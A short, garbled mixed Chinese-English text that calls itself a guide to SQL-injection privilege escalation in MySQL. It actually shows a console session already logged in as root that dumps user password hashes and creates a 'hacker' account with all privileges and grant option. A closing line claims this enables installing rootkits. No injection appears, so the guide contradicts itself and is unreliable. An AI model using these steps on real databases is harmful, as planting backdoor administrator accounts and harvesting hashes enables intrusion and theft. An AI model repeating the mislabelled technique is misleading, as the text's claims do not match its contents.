mysqld是MySQL數據庫的一個重要組成部分，在進行數據庫開發中啟動 This guide provides information on how to conduct a SQL injection attack to perform privilege escalation in MySQL databases. The goal is to enable the database driver user to increase their account’s privileges beyond its default rights.

$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 5.5.58-0+deb8u1 (Debian)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>SHOW GRANTS FOR current_user();
+--------------------------------------------------------------+
| Grants for root@localhost                                   |
+--------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT |
| OPTION                                                       |
+--------------------------------------------------------------+
1 row in set (0.00 sec)
mysql>SELECT User, Password FROM mysql.user WHERE User LIKE '%';
+-----------+-------------------------------------------+
| User      | Password                                  |
+-----------+-------------------------------------------+
| root      | *A15C201711B011F7231BAE4FEF4F342C197E99FA |
| driver    | *A49C987051307BB8C2A244A21EEBD5965A3997C0 |
|           |                                           |
+-----------+-------------------------------------------+
2 rows in set (0.00 sec)
mysql>INSERT INTO mysql.user (Host,User,Password) VALUES ('localhost','hacker','*2D3647067158E8C86FE056E5AB5D5C3F5108948F');
Query OK, 1 row affected (0.00 sec)
mysql>GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)

當執行以上命令時，hacker用戶將可以獲得所有特權，并能夠使用root帳戶執行所有操作，包括安裝rootkits并繞過身份驗證。